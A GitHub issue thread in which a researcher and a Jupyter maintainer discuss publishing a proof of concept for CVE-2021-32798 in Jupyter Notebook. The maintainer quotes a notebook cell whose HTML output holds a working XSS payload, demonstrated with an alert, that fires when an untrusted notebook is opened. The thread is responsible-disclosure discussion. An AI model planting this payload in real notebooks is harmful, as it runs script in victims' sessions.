Is it ok to share a PoC of CVE-2021-32798?

[jasiam]

Hi,

I didn't know where or how to contact Jupyter Security team to ask this, so excuse me if this is not the right place to do it.

I'd like to publish a PoC to show how to get RCE from that CVE. What is your security advisory policy regarding this?

Regards.

[Carreau]

Hi,

Yes, sorry we should have published POC, the advisory is here, I'll try to update it with a POC.

https://github.com/jupyter/notebook/security/advisories/GHSA-hwvq-6gjx-j797

And you can always contact security@ipython.org if you want a private discussion.

I believe this is one Example give in the original (private) thread:

For CVE-2021-32798, create a notebook with the following content in a cell and it would display an alert when opened for the first time in Notebook (in an untrusted state):

{ "cell_type": "code", "execution_count": 0, "metadata": {}, "outputs": [ { "data": { "text/html": [ "<select><iframe></select><img src=x: onerror=alert('xss')>\n"], "text/plain": [] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "" ] }

[jasiam]

Ok, then I'll commit my PoC to my github profile and I'll notify security@ipython.org in case anyone is interested.

Thanks!

[Carreau]

Thanks, or here is fine, security@ipython.org is mostly if you want to have something not public.

[Carreau]

Closing here if that's ok. We can still reopen.